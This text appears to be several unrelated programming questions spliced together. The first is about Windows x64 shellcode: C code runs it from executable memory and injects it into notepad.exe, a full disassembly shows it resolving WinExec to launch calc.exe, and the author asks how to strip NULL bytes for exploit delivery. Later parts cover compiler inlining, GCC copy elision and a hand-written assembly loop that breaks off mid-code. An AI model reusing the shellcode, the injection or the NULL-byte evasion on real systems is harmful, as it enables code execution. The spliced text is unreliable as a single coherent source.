// truncate the copied shellcode -- confirm against the disassembly.
unsigned char *shell_code_end_real = shell_code_start_real;
while (*shell_code_end_real++ != RET_INSTRUCTION) {};
unsigned int sizeofshellcode = shell_code_end_real - shell_code_start_real;
// Copy the shellcode to the allocated memory and execute it...
// NOTE(review): VirtualAlloc/VirtualProtect return values are unchecked;
// a failed allocation would make memcpy dereference NULL.
LPVOID shellcode_mem = VirtualAlloc(NULL, sizeofshellcode, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(shellcode_mem, shell_code_start_real, sizeofshellcode);
DWORD old_protect;
VirtualProtect(shellcode_mem, sizeofshellcode, PAGE_EXECUTE_READ, &old_protect);
void (*jump_to_shellcode)() = (void (*)())shellcode_mem;
jump_to_shellcode();
// Release the memory allocated for the shellcode
VirtualFree(shellcode_mem, sizeofshellcode, MEM_RELEASE);
// Print the shellcode in hex format
print_shellcode(shell_code_start_real, sizeofshellcode);
// Inject shellcode into the notepad.exe process
InjectShellcodeIntoNotepad(shell_code_start_real, sizeofshellcode);
return 0;
}
Everything runs correctly and pops up the Windows calculator.
However, the shellcode often needs to be delivered in a NULL-terminated string. If the shellcode contains NULL bytes, the C code that is being exploited might ignore and drop the rest of the code starting from the first zero byte.
Notice my shellcode has a sparse sprinkling of red NULL bytes!
Update
Based on the comments about modifying the assembly code, it's definitely possible to tweak the shellcode to remove most NULL bytes:
0000000000400000 40 55 push rbp
0000000000400002 48 81 EC F0 00 00 00 sub rsp,0F0h
0000000000400009 48 8D 6C 24 20 lea rbp,[rsp+20h]
000000000040000E 65 48 8B 04 25 60 00 00 00 mov rax,qword ptr gs:[60h]
0000000000400017 48 89 45 00 mov qword ptr [rbp],rax
000000000040001B 48 8B 45 00 mov rax,qword ptr [rbp]
000000000040001F 48 8B 40 18 mov rax,qword ptr [rax+18h]
0000000000400023 48 83 C0 20 add rax,20h
0000000000400027 48 89 45 08 mov qword ptr [rbp+8],rax
000000000040002B 48 8B 45 08 mov rax,qword ptr [rbp+8]
000000000040002F 48 8B 00 mov rax,qword ptr [rax]
0000000000400032 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400036 EB 0B jmp 0000000000400043
0000000000400038 48 8B 45 10 mov rax,qword ptr [rbp+10h]
000000000040003C 48 8B 00 mov rax,qword ptr [rax]
000000000040003F 48 89 45 10 mov qword ptr [rbp+10h],rax
0000000000400043 48 8B 45 08 mov rax,qword ptr [rbp+8]
0000000000400047 48 39 45 10 cmp qword ptr [rbp+10h],rax
000000000040004B 0F 84 85 01 00 00 je 00000000004001D6
0000000000400051 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400055 48 8B 40 50 mov rax,qword ptr [rax+50h]
0000000000400059 48 B9 4B 00 45 00 52 00 4E 00 mov rcx,4E00520045004Bh
0000000000400063 48 39 08 cmp qword ptr [rax],rcx
0000000000400066 0F 85 65 01 00 00 jne 00000000004001D1
000000000040006C 48 8B 45 10 mov rax,qword ptr [rbp+10h]
0000000000400070 48 83 E8 10 sub rax,10h
0000000000400074 48 89 45 18 mov qword ptr [rbp+18h],rax
0000000000400078 48 8B 45 18 mov rax,qword ptr [rbp+18h]
000000000040007C 48 8B 40 30 mov rax,qword ptr [rax+30h]
0000000000400080 48 89 45 20 mov qword ptr [rbp+20h],rax
0000000000400084 48 8B 45 20 mov rax,qword ptr [rbp+20h]
0000000000400088 48 89 45 28 mov qword ptr [rbp+28h],rax
000000000040008C 48 8B 45 28 mov rax,qword ptr [rbp+28h]
0000000000400090 48 63 40 3C movsxd rax,dword ptr [rax+3Ch]
0000000000400094 48 8B 4D 28 mov rcx,qword ptr [rbp+28h]
0000000000400098 48 03 C8 add rcx,rax
000000000040009B 48 8B C1 mov rax,rcx
000000000040009E 48 89 45 30 mov qword ptr [rbp+30h],rax
00000000004000A2 B8 08 00 00 00 mov eax,8
00000000004000A7 48 6B C0 00 imul rax,rax,0
00000000004000AB 48 8B 4D 30 mov rcx,qword ptr [rbp+30h]
00000000004000AF 8B 84 01 88 00 00 00 mov eax,dword ptr [rcx+rax+88h]
00000000004000B6 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000BA 48 03 C8 add rcx,rax
00000000004000BD 48 8B C1 mov rax,rcx
00000000004000C0 48 89 45 38 mov qword ptr [rbp+38h],rax
00000000004000C4 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000C8 8B 40 1C mov eax,dword ptr [rax+1Ch]
00000000004000CB 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000CF 48 03 C8 add rcx,rax
00000000004000D2 48 8B C1 mov rax,rcx
00000000004000D5 48 89 45 40 mov qword ptr [rbp+40h],rax
00000000004000D9 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000DD 8B 40 20 mov eax,dword ptr [rax+20h]
00000000004000E0 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000E4 48 03 C8 add rcx,rax
00000000004000E7 48 8B C1 mov rax,rcx
00000000004000EA 48 89 45 48 mov qword ptr [rbp+48h],rax
00000000004000EE 48 8B 45 38 mov rax,qword ptr [rbp+38h]
00000000004000F2 8B 40 24 mov eax,dword ptr [rax+24h]
00000000004000F5 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
00000000004000F9 48 03 C8 add rcx,rax
00000000004000FC 48 8B C1 mov rax,rcx
00000000004000FF 48 89 45 50 mov qword ptr [rbp+50h],rax
0000000000400103 C7 45 58 00 00 00 00 mov dword ptr [rbp+58h],0
000000000040010A EB 08 jmp 0000000000400114
000000000040010C 8B 45 58 mov eax,dword ptr [rbp+58h]
000000000040010F FF C0 inc eax
0000000000400111 89 45 58 mov dword ptr [rbp+58h],eax
0000000000400114 48 8B 45 38 mov rax,qword ptr [rbp+38h]
0000000000400118 8B 40 18 mov eax,dword ptr [rax+18h]
000000000040011B 39 45 58 cmp dword ptr [rbp+58h],eax
000000000040011E 0F 83 AB 00 00 00 jae 00000000004001CF
0000000000400124 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400127 48 8B 4D 48 mov rcx,qword ptr [rbp+48h]
000000000040012B 8B 04 81 mov eax,dword ptr [rcx+rax*4]
000000000040012E 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
0000000000400132 48 BA 47 65 74 50 72 6F 63 41 mov rdx,41636F7250746547h
000000000040013C 48 39 14 01 cmp qword ptr [rcx+rax],rdx
0000000000400140 0F 85 84 00 00 00 jne 00000000004001CA
0000000000400146 8B 45 58 mov eax,dword ptr [rbp+58h]
0000000000400149 48 8B 4D 50 mov rcx,qword ptr [rbp+50h]
000000000040014D 0F B7 04 41 movzx eax,word ptr [rcx+rax*2]
0000000000400151 48 8B 4D 40 mov rcx,qword ptr [rbp+40h]
0000000000400155 8B 04 81 mov eax,dword ptr [rcx+rax*4]
0000000000400158 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040015C 48 03 C8 add rcx,rax
000000000040015F 48 8B C1 mov rax,rcx
0000000000400162 48 89 45 60 mov qword ptr [rbp+60h],rax
0000000000400166 C6 45 68 57 mov byte ptr [rbp+68h],57h
000000000040016A C6 45 69 69 mov byte ptr [rbp+69h],69h
000000000040016E C6 45 6A 6E mov byte ptr [rbp+6Ah],6Eh
0000000000400172 C6 45 6B 45 mov byte ptr [rbp+6Bh],45h
0000000000400176 C6 45 6C 78 mov byte ptr [rbp+6Ch],78h
000000000040017A C6 45 6D 65 mov byte ptr [rbp+6Dh],65h
000000000040017E C6 45 6E 63 mov byte ptr [rbp+6Eh],63h
0000000000400182 C6 45 6F 00 mov byte ptr [rbp+6Fh],0
0000000000400186 48 8D 55 68 lea rdx,[rbp+68h]
000000000040018A 48 8B 4D 20 mov rcx,qword ptr [rbp+20h]
000000000040018E FF 55 60 call qword ptr [rbp+60h]
0000000000400191 48 89 45 70 mov qword ptr [rbp+70h],rax
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
00000000004001BC BA 05 00 00 00 mov edx,5
00000000004001C1 48 8D 4D 78 lea rcx,[rbp+78h]
00000000004001C5 FF 55 70 call qword ptr [rbp+70h]
00000000004001C8 EB 05 jmp 00000000004001CF
00000000004001CA E9 3D FF FF FF jmp 000000000040010C
00000000004001CF EB 05 jmp 00000000004001D6
00000000004001D1 E9 62 FE FF FF jmp 0000000000400038
00000000004001D6 48 8D A5 D0 00 00 00 lea rsp,[rbp+0D0h]
00000000004001DD 5D pop rbp
00000000004001DE C3 ret
Although I'm not sure how to handle a NULL-terminated string such as "calc.exe" which generates 4 NULL bytes:
0000000000400195 C6 45 78 63 mov byte ptr [rbp+78h],63h
0000000000400199 C6 45 79 61 mov byte ptr [rbp+79h],61h
000000000040019D C6 45 7A 6C mov byte ptr [rbp+7Ah],6Ch
00000000004001A1 C6 45 7B 63 mov byte ptr [rbp+7Bh],63h
00000000004001A5 C6 45 7C 2E mov byte ptr [rbp+7Ch],2Eh
00000000004001A9 C6 45 7D 65 mov byte ptr [rbp+7Dh],65h
00000000004001AD C6 45 7E 78 mov byte ptr [rbp+7Eh],78h
00000000004001B1 C6 45 7F 65 mov byte ptr [rbp+7Fh],65h
00000000004001B5 C6 85 80 00 00 00 00 mov byte ptr [rbp+80h],0
Question
Is it possible to remove the NULL bytes by reshuffling the C code or maybe using compiler intrinsic tricks?
Consider the scenario where you have a complex procedure implementing a state machine, tracked by a state that never changes during a call to the kernel, as in the code illustrated below.
/*
 * Shared state-machine kernel: `mode` selects which specialized
 * recursion to continue and never changes along a call chain, so an
 * inlining compiler can in principle fold the switch away.
 */
static inline void kernel(int recursion, int mode){
if(!recursion) return;
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch(mode){
default: return; /* fixed: original read `default return;` (missing colon) */
case 1: mode1(recursion-1); break; /* breaks added: without them case 1 fell through and also ran mode2 */
case 2: mode2(recursion-1); break;
}
}
/* Entry point for state 1: the constant mode argument is what should
 * let the compiler specialize kernel() after inlining. */
void mode1(int recursion){
kernel(recursion,1); /* fixed: missing semicolon in the original */
}
/* Entry point for state 2; mirrors mode1. */
void mode2(int recursion){
kernel(recursion,2); /* fixed: missing semicolon in the original */
}
If only mode1 and mode2 functions are called elsewhere, can recent compilers eliminate the inner branches?
All functions are in the same compilation unit.
Came across this while implementing an interpreter for a subset of SPIR-V byte code. The inner branch selects between finding out how much to allocate, building up the AST, and doing the actual evaluation of expressions. The kernel takes care of traversing the tree, with all the switches on instruction OpCodes. Writing separate functions for each state would be even more difficult to maintain, since the kernel already takes up 1000+ lines of code, and keeping the same traversal logic in sync across copies can be really difficult.
(I know modern c++ have constexpr if, but this is pure c code.)
Edit:
I've tried with msvc compiler with the following code:
/* Test input: a tiny opcode stream driving the mode switch below. */
uint32_t interp_code[]={1,2,1,1,2};
/* Mutually recursive mode wrappers; defined after kernel. */
void mode1(const uint32_t* code, int recursion);
void mode2(const uint32_t* code, int recursion);
/* Traversal kernel (MSVC inlining experiment). Consumes one opcode from
 * `code` per recursion level; `mode` never changes along a call chain, so
 * the question is whether inlining lets the compiler fold the inner
 * switch (mode) away.
 * NOTE(review): the cases below deliberately fall through — the author
 * states "fall through is expected" — so each opcode triggers the
 * matching call AND the case after it. */
static INLINE void kernel(const uint32_t* code, int recursion, int mode)
{
if (!recursion) return;   /* recursion budget exhausted */
// branches all lead to similar switch cases here.
// logical branches and loops can be quite complicated.
switch (*code) {          /* outer dispatch on the current opcode */
default: return;
case 1:
switch (mode) {           /* inner dispatch on the constant mode */
default: return;
case 1: mode1(code + 1, recursion - 1);   /* fallthrough intended */
case 2: mode2(code + 1, recursion - 1);
}
/* fallthrough intended */
case 2:
switch(mode) {            /* opcode 2 swaps which mode runs first */
default: return;
case 1: mode2(code + 1, recursion - 1);   /* fallthrough intended */
case 2: mode1(code + 1, recursion - 1);
}
}
}
/* Mode-1 wrapper: delegates to the shared kernel with the mode
 * baked in as the constant 1. */
void mode1(const uint32_t* code, int recursion)
{
    kernel(code, recursion, /* mode = */ 1);
}
/* Mode-2 wrapper: delegates to the shared kernel with the mode
 * baked in as the constant 2. */
void mode2(const uint32_t* code, int recursion)
{
    kernel(code, recursion, /* mode = */ 2);
}
/* Drive the experiment: five levels of recursion starting in mode 1. */
int main(void)
{
    mode1(interp_code, 5);
    return 0;
}
Using inline in the INLINE place yielded a function call (O2 optimizations), and using __forceinline yields the two modes compiled separately with no function call.
Disassembly for inline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF65F8910C0 48 83 EC 28 sub rsp,28h
33: kernel(code, recursion, 1);
00007FF65F8910C4 85 D2 test edx,edx
00007FF65F8910C6 74 6C je mode1+74h (07FF65F891134h)
00007FF65F8910C8 48 89 5C 24 30 mov qword ptr [rsp+30h],rbx
00007FF65F8910CD 48 8D 59 04 lea rbx,[rcx+4]
00007FF65F8910D1 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF65F8910D6 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF65F8910DB 8D 7A FF lea edi,[rdx-1]
00007FF65F8910DE 66 90 xchg ax,ax
00007FF65F8910E0 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF65F8910E3 8B F7 mov esi,edi
00007FF65F8910E5 83 E9 01 sub ecx,1
00007FF65F8910E8 74 07 je mode1+31h (07FF65F8910F1h)
00007FF65F8910EA 83 F9 01 cmp ecx,1
00007FF65F8910ED 75 36 jne mode1+65h (07FF65F891125h)
00007FF65F8910EF EB 1A jmp mode1+4Bh (07FF65F89110Bh)
00007FF65F8910F1 8B D7 mov edx,edi
00007FF65F8910F3 48 8B CB mov rcx,rbx
00007FF65F8910F6 E8 C5 FF FF FF call mode1 (07FF65F8910C0h)
00007FF65F8910FB 41 B8 02 00 00 00 mov r8d,2
00007FF65F891101 8B D7 mov edx,edi
00007FF65F891103 48 8B CB mov rcx,rbx
00007FF65F891106 E8 F5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89110B 41 B8 02 00 00 00 mov r8d,2
00007FF65F891111 8B D7 mov edx,edi
00007FF65F891113 48 8B CB mov rcx,rbx
00007FF65F891116 E8 E5 FE FF FF call kernel (07FF65F891000h)
00007FF65F89111B FF CF dec edi
00007FF65F89111D 48 83 C3 04 add rbx,4
00007FF65F891121 85 F6 test esi,esi
00007FF65F891123 75 BB jne mode1+20h (07FF65F8910E0h)
00007FF65F891125 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF65F89112A 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF65F89112F 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF65F891134 48 83 C4 28 add rsp,28h
00007FF65F891138 C3 ret
For __forceinline:
31: void mode1(const uint32_t* code,int recursion)
32: {
00007FF670271002 EC in al,dx
00007FF670271003 28 85 D2 74 60 48 sub byte ptr [rbp+486074D2h],al
33: kernel(code, recursion, 1);
00007FF670271009 89 5C 24 30 mov dword ptr [rsp+30h],ebx
00007FF67027100D 48 8D 59 04 lea rbx,[rcx+4]
00007FF670271011 48 89 74 24 38 mov qword ptr [rsp+38h],rsi
00007FF670271016 48 89 7C 24 20 mov qword ptr [rsp+20h],rdi
00007FF67027101B 8D 7A FF lea edi,[rdx-1]
00007FF67027101E 66 90 xchg ax,ax
00007FF670271020 8B 4B FC mov ecx,dword ptr [rbx-4]
00007FF670271023 8B F7 mov esi,edi
00007FF670271025 83 E9 01 sub ecx,1
00007FF670271028 74 07 je mode1+31h (07FF670271031h)
00007FF67027102A 83 F9 01 cmp ecx,1
00007FF67027102D 75 2A jne mode1+59h (07FF670271059h)
00007FF67027102F EB 14 jmp mode1+45h (07FF670271045h)
00007FF670271031 8B D7 mov edx,edi
00007FF670271033 48 8B CB mov rcx,rbx
00007FF670271036 E8 C5 FF FF FF call mode1 (07FF670271000h)
00007FF67027103B 8B D7 mov edx,edi
00007FF67027103D 48 8B CB mov rcx,rbx
00007FF670271040 E8 2B 00 00 00 call mode2 (07FF670271070h)
00007FF670271045 8B D7 mov edx,edi
00007FF670271047 48 8B CB mov rcx,rbx
00007FF67027104A E8 21 00 00 00 call mode2 (07FF670271070h)
00007FF67027104F FF CF dec edi
00007FF670271051 48 83 C3 04 add rbx,4
00007FF670271055 85 F6 test esi,esi
00007FF670271057 75 C7 jne mode1+20h (07FF670271020h)
00007FF670271059 48 8B 74 24 38 mov rsi,qword ptr [rsp+38h]
00007FF67027105E 48 8B 5C 24 30 mov rbx,qword ptr [rsp+30h]
00007FF670271063 48 8B 7C 24 20 mov rdi,qword ptr [rsp+20h]
34: }
00007FF670271068 48 83 C4 28 add rsp,28h
00007FF67027106C C3 ret
It seems with inline the compiler chose to inline the entirety of mode2 function body, and make kernel a separate function call. __forceinline forced the mode1 and mode2 to compile into two function bodies with the kernel. (This code doesn't break on the case, so fall through is expected)
Using the plain inline directive yields the same code as leaving INLINE empty, at O2.
I failed to find a flag that controls the named return value optimization for C language. For C++ it seems to be -fno-elide-constructors.
The source code implementing it is here, but since it is a middle-end pass, it reveals no front-end information, even in the comments. The manual section did not exactly help either. However, disassembling shows that, since it is off at O0 and enabled at O1, it must be one of the following:
-fauto-inc-dec
-fcprop-registers
-fdce
-fdefer-pop
-fdelayed-branch
-fdse
-fguess-branch-probability
-fif-conversion2
-fif-conversion
-finline-small-functions
-fipa-pure-const
-fipa-reference
-fmerge-constants
-fsplit-wide-types
-ftree-builtin-call-dce
-ftree-ccp
-ftree-ch
-ftree-copyrename
-ftree-dce
-ftree-dominator-opts
-ftree-dse
-ftree-fre
-ftree-sra
-ftree-ter
-funit-at-a-time
C code:
/* Three-field aggregate. At 3 longs (24 bytes on LP64) it is too large
 * to be returned in registers, so the SysV ABI returns it through a
 * hidden pointer argument — visible in the O1 disassembly below, where
 * f() writes through rdi at offsets 0x0/0x8/0x10. */
struct p {
long x;   /* stored at offset 0x00 */
long y;   /* stored at offset 0x08 */
long z;   /* stored at offset 0x10 */
};
__attribute__((noinline))
struct p f(void) {
struct p copy;
copy.x = 1;
copy.y = 2;
copy.z = 3;
return copy;
}
/* Call f() once; volatile keeps the returned struct from being
 * optimized out entirely. */
int main(int argc, char** argv) {
    (void)argc;
    (void)argv;
    volatile struct p inst = f();
    return 0;
}
Compiled with O0 we see that the 'copy' structure is naively allocated on stack:
00000000004004b6 <f>:
4004b6: 55 push rbp
4004b7: 48 89 e5 mov rbp,rsp
4004ba: 48 89 7d d8 mov QWORD PTR [rbp-0x28],rdi
4004be: 48 c7 45 e0 01 00 00 mov QWORD PTR [rbp-0x20],0x1
4004c5: 00
4004c6: 48 c7 45 e8 02 00 00 mov QWORD PTR [rbp-0x18],0x2
4004cd: 00
4004ce: 48 c7 45 f0 03 00 00 mov QWORD PTR [rbp-0x10],0x3
4004d5: 00
4004d6: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004da: 48 8b 55 e0 mov rdx,QWORD PTR [rbp-0x20]
4004de: 48 89 10 mov QWORD PTR [rax],rdx
4004e1: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18]
4004e5: 48 89 50 08 mov QWORD PTR [rax+0x8],rdx
4004e9: 48 8b 55 f0 mov rdx,QWORD PTR [rbp-0x10]
4004ed: 48 89 50 10 mov QWORD PTR [rax+0x10],rdx
4004f1: 48 8b 45 d8 mov rax,QWORD PTR [rbp-0x28]
4004f5: 5d pop rbp
4004f6: c3 ret
Compiled with O1 it is not allocated but a pointer is passed as an implicit argument
00000000004004b6 <f>:
4004b6: 48 89 f8 mov rax,rdi
4004b9: 48 c7 07 01 00 00 00 mov QWORD PTR [rdi],0x1
4004c0: 48 c7 47 08 02 00 00 mov QWORD PTR [rdi+0x8],0x2
4004c7: 00
4004c8: 48 c7 47 10 03 00 00 mov QWORD PTR [rdi+0x10],0x3
4004cf: 00
4004d0: c3 ret
The closest thing to that in GCC (i.e. a switch for copy elision) is -fcprop-registers. Copy elision doesn't exist in C, but this is the most similar feature to that. From the man page:
After register allocation and post-register allocation instruction
splitting, we perform a copy-propagation pass to try to reduce
scheduling dependencies and occasionally eliminate the copy.
Enabled at levels -O, -O2, -O3, -Os.
So I'm trying to optimize with pure assembly this C function that takes 2 images and outputs pixel by pixel its maximum difference in a grey scale:
/* Infinity norm of the per-channel difference between two pixels:
 * returns max(|x1-x2|, |y1-y2|, |z1-z2|). The unsigned chars promote
 * to int before subtraction, so the differences cannot wrap. */
unsigned short infNorm(unsigned char x1, unsigned char y1, unsigned char z1, unsigned char x2, unsigned char y2, unsigned char z2 ){
    short dx = (short)abs(x1 - x2);
    short dy = (short)abs(y1 - y2);
    short dz = (short)abs(z1 - z2);
    short best = dx;
    if (dy > best) best = dy;
    if (dz > best) best = dz;
    return (unsigned short)best;
}
/* Per-pixel difference of two 4-byte-per-pixel images: for each of the
 * m x n pixels, write the infinity norm of the first three channel
 * differences into the first three output channels and set the fourth
 * (alpha) to 255. Row strides are given in bytes via the *_row_size
 * arguments; rows may be padded beyond m*4 bytes. */
void diff_c (unsigned char *src, unsigned char *src_2, unsigned char *dst, int m, int n, int src_row_size, int src_2_row_size, int dst_row_size) {
    /* View the flat buffers as row-major matrices with their own strides. */
    unsigned char (*a)[src_row_size]   = (unsigned char (*)[src_row_size]) src;
    unsigned char (*b)[src_2_row_size] = (unsigned char (*)[src_2_row_size]) src_2;
    unsigned char (*out)[dst_row_size] = (unsigned char (*)[dst_row_size]) dst;

    for (int row = 0; row < n; row++) {
        for (int col = 0; col < m; ++col) {
            int px = col * 4;   /* 4 bytes per pixel */
            unsigned char d = infNorm(a[row][px], a[row][px+1], a[row][px+2],
                                      b[row][px], b[row][px+1], b[row][px+2]);
            out[row][px]     = d;    /* channel 0 */
            out[row][px + 1] = d;    /* channel 1 */
            out[row][px + 2] = d;    /* channel 2 */
            out[row][px + 3] = 255;  /* alpha: fully opaque */
        }
    }
}
I did this using SIMD and got a function that is much faster than any output from gcc on any optimization flag. Now, I wanted to do the same but without using any SSE instructions. For this I objdumped gcc's build and isolated the part that implements these two functions (gcc -O3), to get an idea of what gcc was doing:
0000000000402280 <infNorm>:
402280: 40 0f b6 ff movzx edi,dil
402284: 0f b6 c9 movzx ecx,cl
402287: 40 0f b6 f6 movzx esi,sil
40228b: 29 cf sub edi,ecx
40228d: 45 0f b6 c0 movzx r8d,r8b
402291: 0f b6 d2 movzx edx,dl
402294: 89 f8 mov eax,edi
402296: 44 29 c6 sub esi,r8d
402299: 45 0f b6 c9 movzx r9d,r9b
40229d: c1 f8 1f sar eax,0x1f
4022a0: 44 29 ca sub edx,r9d
4022a3: 31 c7 xor edi,eax
4022a5: 29 c7 sub edi,eax
4022a7: 89 f0 mov eax,esi
4022a9: c1 f8 1f sar eax,0x1f
4022ac: 31 c6 xor esi,eax
4022ae: 29 c6 sub esi,eax
4022b0: 89 d0 mov eax,edx
4022b2: c1 f8 1f sar eax,0x1f
4022b5: 31 c2 xor edx,eax
4022b7: 29 c2 sub edx,eax
4022b9: 66 39 f7 cmp di,si
4022bc: 7e 12 jle 4022d0 <infNorm+0x50>
4022be: 66 39 d7 cmp di,dx
4022c1: 89 d0 mov eax,edx
4022c3: 0f 4d c7 cmovge eax,edi
4022c6: c3 ret
4022c7: 66 0f 1f 84 00 00 00 nop WORD PTR [rax+rax*1+0x0]
4022ce: 00 00
4022d0: 66 39 d6 cmp si,dx
4022d3: 89 d0 mov eax,edx
4022d5: 0f 4d c6 cmovge eax,esi
4022d8: c3 ret
4022d9: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
00000000004022e0 <diff_c>:
4022e0: 45 85 c0 test r8d,r8d
4022e3: 0f 8e 05 01 00 00 jle 4023ee <diff_c+0x10e>
4022e9: 41 57 push r15
4022eb: 45 31 ff xor r15d,r15d
4022ee: 41 56 push r14
4022f0: 44 8d 34 8d 00 00 00 lea r14d,[rcx*4+0x0]
4022f7: 00
4022f8: 41 55 push r13
4022fa: 41 54 push r12
4022fc: 49 89 f4 mov r12,rsi
4022ff: 55 push rbp
402300: 48 89 fd mov rbp,rdi
402303: 53 push rbx
402304: 48 63 44 24 38 movsxd rax,DWORD PTR [rsp+0x38]
402309: 48 89 44 24 e8 mov QWORD PTR [rsp-0x18],rax
40230e: 49 63 c1 movsxd rax,r9d
402311: 48 89 44 24 f8 mov QWORD PTR [rsp-0x8],rax
402316: 48 63 44 24 40 movsxd rax,DWORD PTR [rsp+0x40]
40231b: 48 89 44 24 f0 mov QWORD PTR [rsp-0x10],rax
402320: 85 c9 test ecx,ecx
402322: 0f 8e a0 00 00 00 jle 4023c8 <diff_c+0xe8>
402328: 31 c0 xor eax,eax
40232a: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
402330: 48 63 d8 movsxd rbx,eax
402333: 44 8d 58 01 lea r11d,[rax+0x1]
402337: 44 8d 50 02 lea r10d,[rax+0x2]
40233b: 41 0f b6 34 1c movzx esi,BYTE PTR [r12+rbx*1]
402340: 44 0f b6 4c 1d 00 movzx r9d,BYTE PTR [rbp+rbx*1+0x0]
402346: 4d 63 db movsxd r11,r11d
402349: 4d 63 d2 movsxd r10,r10d
40234c: 42 0f b6 7c 1d 00 movzx edi,BYTE PTR [rbp+r11*1+0x0]
402352: 47 0f b6 2c 14 movzx r13d,BYTE PTR [r12+r10*1]
402357: 41 29 f1 sub r9d,esi
40235a: 44 89 ce mov esi,r9d
40235d: c1 fe 1f sar esi,0x1f
402360: 41 31 f1 xor r9d,esi
402363: 41 29 f1 sub r9d,esi
402366: 43 0f b6 34 1c movzx esi,BYTE PTR [r12+r11*1]
40236b: 29 f7 sub edi,esi
40236d: 89 fe mov esi,edi
40236f: c1 fe 1f sar esi,0x1f
402372: 31 f7 xor edi,esi
402374: 29 f7 sub edi,esi
402376: 42 0f b6 74 15 00 movzx esi,BYTE PTR [rbp+r10*1+0x0]
40237c: 44 29 ee sub esi,r13d
40237f: 41 89 f5 mov r13d,esi
402382: 41 c1 fd 1f sar r13d,0x1f
402386: 44 31 ee xor esi,r13d
402389: 44 29 ee sub esi,r13d
40238c: 41 89 fd mov r13d,edi
40238f: 66 39 fe cmp si,di
402392: 44 0f 4d ee cmovge r13d,esi
402396: 66 44 39 ce cmp si,r9w
40239a: 41 0f 4c f1 cmovl esi,r9d
40239e: 66 41 39 f9 cmp r9w,di
4023a2: 41 0f 4e f5 cmovle esi,r13d
4023a6: 40 88 34 1a mov BYTE PTR [rdx+rbx*1],sil
4023aa: 42 88 34 1a mov BYTE PTR [rdx+r11*1],sil
4023ae: 42 88 34 12 mov BYTE PTR [rdx+r10*1],sil
4023b2: 8d 70 03 lea esi,[rax+0x3]
4023b5: 83 c0 04 add eax,0x4
4023b8: 44 39 f0 cmp eax,r14d
4023bb: 48 63 f6 movsxd rsi,esi
4023be: c6 04 32 ff mov BYTE PTR [rdx+rsi*1],0xff
4023c2: 0f 85 68 ff ff ff jne 402330 <diff_c+0x50>
4023c8: 41 83 c7 01 add r15d,0x1
4023cc: 4c 03 64 24 e8 add r12,QWORD PTR [rsp-0x18]
4023d1: 48 03 6c 24 f8 add rbp,QWORD PTR [rsp-0x8]
4023d6: 48 03 54 24 f0 add rdx,QWORD PTR [rsp-0x10]
4023db: 45 39 c7 cmp r15d,r8d
4023de: 0f 85 3c ff ff ff jne 402320 <diff_c+0x40>
4023e4: 5b pop rbx
4023e5: 5d pop rbp
4023e6: 41 5c pop r12
4023e8: 41 5d pop r13
4023ea: 41 5e pop r14
4023ec: 41 5f pop r15
4023ee: f3 c3 repz ret
So with this in mind, the idea — counter to what gcc was doing — was to avoid memory accesses as much as possible; using something similar to gcc's approach, I unrolled the loop one more time and wrote this:
; Hand-written pixel-diff loop. SysV AMD64 arguments: rdi=src, rsi=src_2,
; rdx=dst, ecx=m, r8d=n (the row-size arguments are not used — the loop
; treats the images as one contiguous m*n-pixel buffer).
; Processes TWO 4-byte pixels per iteration (8-byte loads/stores).
; NOTE(review): `sub rcx, 2` with the `je .tend` test assumes m*n is
; even — an odd pixel count would skip the terminating compare. Verify.
diff_asm:
push rbp
push r12
push r13
push r14
push r15
push rbx
sub rsp, 8                         ; realign stack to 16 for the calls below
mov r15, rdx                       ; stash dst: mul clobbers rdx
mov eax, r8d
mov ecx, ecx                       ; zero-extend m into full rcx
mul rcx                            ; rax = n * m = total pixel count
mov rcx, rax                       ; rcx = pixels remaining (loop counter)
mov rdx, r15                       ; restore dst pointer
.cicle:
cmp rcx, 0
je .tend
mov rbx, [rdi + rcx*4 - 8]         ; load two src pixels (8 bytes)
movzx r12, bl                      ; pixel 1, channel 0
shr rbx, 8
movzx r13, bl                      ; pixel 1, channel 1
shr rbx, 8
movzx r14, bl                      ; pixel 1, channel 2
shr rbx, 16                        ; skip channel 3; rbx low = pixel 2
mov r15, [rsi + rcx*4 - 8]         ; load matching two src_2 pixels
movzx rbp, r15b
shr r15, 8
movzx r8, r15b
shr r15, 8
movzx r9, r15b
shr r15, 16
call inf_norm                      ; rotates one BGRA result into rax
movzx r12, bl                      ; unpack the second pixel pair
shr rbx, 8
movzx r13, bl
shr rbx, 8
movzx r14, bl
shr rbx, 8
